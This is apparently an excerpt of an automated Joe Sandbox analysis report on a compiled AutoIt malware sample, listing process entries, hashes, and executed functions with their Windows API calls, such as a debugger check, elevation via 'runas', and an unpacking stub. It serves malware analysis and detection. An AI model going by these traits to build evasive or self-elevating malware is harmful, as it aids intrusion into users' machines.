Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:19:00
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe
Imagebase:	0xdc0000
File size:	915'968 bytes
MD5 hash:	FE8FBB45F71518A33C161E70F6EE1037
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:19:48
Start date:	30/12/2024
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff791c40000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00D4374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D4376D

Part of subcall function 00D44257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_VKKDXE.exe,00000104,?,00000000,00000001,00000000), ref: 00D4428C

IsDebuggerPresent.KERNEL32(?,?), ref: 00D4377F
GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_VKKDXE.exe,00000104,?,00E01120,C:\Users\user\Desktop\._cache_VKKDXE.exe,00E01124,?,?), ref: 00D437EE

Part of subcall function 00D434F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D4352A

SetCurrentDirectoryW.KERNEL32(?), ref: 00D43860
MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00DF2934,00000010), ref: 00DB21C5
SetCurrentDirectoryW.KERNEL32(?,?), ref: 00DB21FD
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00DB2232
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DDDAA4), ref: 00DB2290
ShellExecuteW.SHELL32(00000000), ref: 00DB2297

Part of subcall function 00D430A5: GetSysColorBrush.USER32(0000000F), ref: 00D430B0
Part of subcall function 00D430A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D430BF
Part of subcall function 00D430A5: LoadIconW.USER32(00000063), ref: 00D430D5
Part of subcall function 00D430A5: LoadIconW.USER32(000000A4), ref: 00D430E7
Part of subcall function 00D430A5: LoadIconW.USER32(000000A2), ref: 00D430F9
Part of subcall function 00D430A5: RegisterClassExW.USER32(?), ref: 00D43167

Part of subcall function 00D42E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D42ECB
Part of subcall function 00D42E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D42EEC
Part of subcall function 00D42E9D: ShowWindow.USER32(00000000), ref: 00D42F00
Part of subcall function 00D42E9D: ShowWindow.USER32(00000000), ref: 00D42F09

Part of subcall function 00D43598: _memset.LIBCMT ref: 00D435BE
Part of subcall function 00D43598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D43667

Strings

runas, xrefs: 00DB228B
This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00DB21BE
", xrefs: 00D4379D
C:\Users\user\Desktop\._cache_VKKDXE.exe, xrefs: 00D437B4, 00D437E9, 00D437FD, 00DB2257

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: C:\Users\user\Desktop\._cache_VKKDXE.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
API String ID: 4253510256-4231115373
Opcode ID: 08e3cd09a0a3e616664be23081edf3406e68623b7028a6a53d43b67810ac98d4
Instruction ID: 570c7bb13377ef6713787ca8cf0c7d5b11d6374ab836585b740cffb1e3bb0978
Opcode Fuzzy Hash: 08e3cd09a0a3e616664be23081edf3406e68623b7028a6a53d43b67810ac98d4
Instruction Fuzzy Hash: 2D510271644345AFDF10ABA89C46FBD7B69DB15700F0400AAF782F62E1C6718A89CB72

Function 00DA30AD Relevance: 16.9, APIs: 11, Instructions: 397
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DA3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DA2AA6,?,?), ref: 00DA3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DA317F

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00DA321E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DA32B6
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DA34F5
RegCloseKey.ADVAPI32(00000000), ref: 00DA3502

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 2c09092ebdbf0eccfa40e379e9e00a7d2504f1717d68283a646f374f3e59047f
Instruction ID: de561b3b2b9f772c7d81950c68a51b0b4f30b7e448c00354b7b1741a9c542851
Opcode Fuzzy Hash: 2c09092ebdbf0eccfa40e379e9e00a7d2504f1717d68283a646f374f3e59047f
Instruction Fuzzy Hash: 8FE16D71604301AFCB15DF28C895D2ABBEAEF89314F04896DF44ADB261DB31ED05CB61

Function 00D429C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00D42A33
KillTimer.USER32(?,00000001), ref: 00D42A5D
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D42A80
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D42A8B
CreatePopupMenu.USER32 ref: 00D42A9F
PostQuitMessage.USER32(00000000), ref: 00D42AAE

Strings

TaskbarCreated, xrefs: 00D42A86

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: ce6bd51bfbb7151e8bc9b852c8e625510a4703f12d790228ca9521451c9d658e
Instruction ID: b311f43004f75a8ca806b57f5ddb65505eabdee3cf05baeb0e7b8fd5c444bc6d
Opcode Fuzzy Hash: ce6bd51bfbb7151e8bc9b852c8e625510a4703f12d790228ca9521451c9d658e
Instruction Fuzzy Hash: 6F41593114024A9FDB34AF68DC0BBB936A6EB54304F884129FD82FA2A1DA75DD84C775

Function 00D5E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00D5E4A7

Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9

GetCurrentProcess.KERNEL32(00000000,00DDDC28,?,?), ref: 00D5E567
GetNativeSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5BC
FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5E5C7
FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5E5DA
GetSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5E4
GetSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5F0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
String ID:
API String ID: 2717633055-0
Opcode ID: 9dc5c9ef61227845fced0ff00145f4a3a79f24007d222dd0272ab31ba0a6e8d3
Instruction ID: a5a969013e452d2e3c4c99afef288b026f9ea5db803cbf7f4ca05b68464dc500
Opcode Fuzzy Hash: 9dc5c9ef61227845fced0ff00145f4a3a79f24007d222dd0272ab31ba0a6e8d3
Instruction Fuzzy Hash: D661B2B2809384CBCF19DF6898C15E97FA5AF2A305F1D45D9DC899B207E624CA0CCB75

Function 00D431F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D43202
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D43219
LoadResource.KERNEL32(?,00000000), ref: 00DB57D7
SizeofResource.KERNEL32(?,00000000), ref: 00DB57EC
LockResource.KERNEL32(?), ref: 00DB57FF

Strings

SCRIPT, xrefs: 00D4320F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 7dc6f5a07e0fbb924059ba7bcba60d96aa97b66afb560fa0615f4006fedf5f38
Instruction ID: 3e87d57c59aeb63d2bbcd6003148c736bf6aa34d83e8c47fd733afc805d64abe
Opcode Fuzzy Hash: 7dc6f5a07e0fbb924059ba7bcba60d96aa97b66afb560fa0615f4006fedf5f38
Instruction Fuzzy Hash: 15117070200702BFD7215B65EC88F27BBBAEBC9B51F14806CB402D6250DBB1DD00C670

Function 00D86F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D86F7D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D86F8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00D86FAC
__wsplitpath.LIBCMT ref: 00D86FD0
_wcscat.LIBCMT ref: 00D86FE3
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00D87022

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 19ca042cc2d7121af1b0bf88d3a1340d476bf14bc3c3357918071d752ab206f7
Instruction ID: dac83a2872410f8dd56032043d9839e6c84f38e8c55ae253ae340fbeaaa44a91
Opcode Fuzzy Hash: 19ca042cc2d7121af1b0bf88d3a1340d476bf14bc3c3357918071d752ab206f7
Instruction Fuzzy Hash: 96218E71904219ABDB11ABA0CC88FEEB7BDAB49304F2404A9F645E3241E771DF84CB71

Function 00EA20B0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00EA21EA
GetProcAddress.KERNEL32(?,00E9BFF9), ref: 00EA2208
ExitProcess.KERNEL32(?,00E9BFF9), ref: 00EA2219
VirtualProtect.KERNEL32(00D40000,00001000,00000004,?,00000000), ref: 00EA2267
VirtualProtect.KERNEL32(00D40000,00001000), ref: 00EA227C

Memory Dump Source

Source File: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: ab00286cbc7674229896972e6130cbba3fc1e852d2509d77787c8da0a18c9528
Instruction ID: 5fefe601150ca391f404b0ea42f7080f1b14e279d6a104ab50b3b0b0160e7f30
Opcode Fuzzy Hash: ab00286cbc7674229896972e6130cbba3fc1e852d2509d77787c8da0a18c9528
Instruction Fuzzy Hash: D051E972A452525BD7215ABCCCC06A5BBA4EB6B324718173CCBE1FF3C5E79478068760

Function 00D8EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D878AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00D878CB

CoInitialize.OLE32(00000000), ref: 00D8F04D
CoCreateInstance.COMBASE(00DCDA7C,00000000,00000001,00DCD8EC,?), ref: 00D8F066
CoUninitialize.COMBASE ref: 00D8F083

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

Strings

.lnk, xrefs: 00D8F02B, 00D8F03D

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 68e6edd79ed2f54440d818268da4f94fac630bfc30ab98e874040d787b0ef249
Instruction ID: df64b22d69869c6f75447b0fcdb205b03e23eee07677adabeea8fa9467694da7
Opcode Fuzzy Hash: 68e6edd79ed2f54440d818268da4f94fac630bfc30ab98e874040d787b0ef249
Instruction Fuzzy Hash: 95A138756043019FCB10EF14C884E6ABBE6FF89324F148958F8999B3A1DB31ED45CBA1

Function 00D5DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00D4C848,00D4C848), ref: 00D5DDA2
FindFirstFileW.KERNEL32(00D4C848,?), ref: 00DB4A83

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$AttributesFindFirst
String ID:
API String ID: 4185537391-0
Opcode ID: d8f1037e47c2afa8a4a4cdc56e08bb0cad3513a443c459dbfcfb4512cc4bc28a
Instruction ID: 101c878d1a875d7aa6a11e70776e5cde9ceea085dd97357fe10452379d94f94a
Opcode Fuzzy Hash: d8f1037e47c2afa8a4a4cdc56e08bb0cad3513a443c459dbfcfb4512cc4bc28a
Instruction Fuzzy Hash: EEE0D8314157039B96246738DC0DCE9376D9B0533DB180715FC76C11E0E7709D4489FA

Function 00D4DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d81b50601c1022c50277dc26bca19904036e6aeb4aa5f47c166bd84c9a1e620
Instruction ID: 805014a47de3b2d52885956a53e041090571ac6a3ce4fdb045c425509c8b21e9
Opcode Fuzzy Hash: 4d81b50601c1022c50277dc26bca19904036e6aeb4aa5f47c166bd84c9a1e620
Instruction Fuzzy Hash: 8F228E70900206DFDB24DF58C490ABAB7F1FF19300F18816AE8969B391E775E985DBB1

Function 00D53680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 794c5654cf27dbf5b98d505b7d4102b4388e39bf0a4dd816f072d0a79cf88830
Instruction ID: e1e350e04762e6cc4d395757ecbe0c9aec9b4daa826dc964726e9d75fa6724b9
Opcode Fuzzy Hash: 794c5654cf27dbf5b98d505b7d4102b4388e39bf0a4dd816f072d0a79cf88830
Instruction Fuzzy Hash: D2925870608341CFDB24DF18C484B6AB7E1FF89345F18885DED8A8B292D775E949CB62

Function 00DBC146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00DBC158

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 6cac2b78d772a3a6a67a18161ed0b0b403103863219a198a786edd0f2af48d65
Instruction ID: 7bb55d411ae669d15c8b1750d8b3eb6c4c24f35dcf68f0b7895ef79b4db59036
Opcode Fuzzy Hash: 6cac2b78d772a3a6a67a18161ed0b0b403103863219a198a786edd0f2af48d65
Instruction Fuzzy Hash: 9EC002B180410ADBC715CB84C9459EAB6BCAB04300F104096A156E1100D7B09A459B71

Function 00D4E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E279
timeGetTime.WINMM ref: 00D4E51A
TranslateMessage.USER32(?), ref: 00D4E646
DispatchMessageW.USER32(?), ref: 00D4E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E664
LockWindowUpdate.USER32(00000000), ref: 00D4E697
DestroyWindow.USER32 ref: 00D4E6A3
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D4E6BD
Sleep.KERNEL32(0000000A), ref: 00DB5B15
TranslateMessage.USER32(?), ref: 00DB62AF
DispatchMessageW.USER32(?), ref: 00DB62BD
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DB62D1

Strings

@TRAY_ID, xrefs: 00DB5D6E
@GUI_WINHANDLE, xrefs: 00DB5C05
@GUI_CTRLHANDLE, xrefs: 00DB5C51
@GUI_CTRLID, xrefs: 00DB5BB9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
